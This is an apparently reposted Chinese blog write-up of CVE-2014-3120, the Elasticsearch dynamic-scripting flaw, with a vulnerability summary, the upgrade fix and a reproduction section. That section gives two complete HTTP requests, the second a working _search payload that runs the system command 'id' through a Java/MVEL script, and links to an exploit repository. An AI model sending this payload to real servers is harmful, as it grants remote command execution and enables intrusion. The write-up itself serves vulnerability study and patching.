ElasticSearch 命令执行漏洞
生活随笔
收集整理的這篇文章主要介紹了
ElasticSearch 命令执行漏洞
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
漏洞編號:CVE-2014-3120
漏洞詳情
| CVE編號 | CVE-2014-3120 | 漏洞級別 | 中危6.8 |
|---|---|---|---|
| 標題 | Elasticsearch默認配置允許動態腳本執行漏洞 | 披露時間 | 2014/07/29 |
| 漏洞總結 | Elasticsearch 1.2版本及之前的默認配置啟用了動態腳本,攻擊者可以通過_search的source參數執行任意MVEL表達式和Java代碼。需要注意的是,只有在用戶沒有在獨立的虛擬機中運行Elasticsearch時,這才違反了供應商的安全策略。 | ||
| 利用路徑 | NETWORK | 利用難度 | 一般8.6 |
| 影響產品 | elasticsearch | ||
| 解決方案 | 升級Elasticsearch到1.2.1以上版本,或禁用動態腳本功能。建議將Elasticsearch運行在一個獨立的虛擬機中,以增強安全性。 |
漏洞復現
添加一條數據
POST /website/blog/ HTTP/1.1
Host: 0.0.0.0:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
{
"name": "phithon"
}
執行命令
POST /_search?pretty HTTP/1.1
Host: 0.0.0.0:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343
{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
}
}
},
"script_fields": {
"command": {
"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
}
}
}
POC&EXP
github:POC-EXP/ElasticSearch 命令執行漏洞 at main · twsec-pro/POC-EXP (github.com)
yakit:cc5908ae-5ea5-4060-8f15-1da729b3fb8c
總結
以上是生活随笔為你收集整理的ElasticSearch 命令执行漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 步步挣小程序安全吗
- 下一篇: vue.js中的el什么意思(Vue.c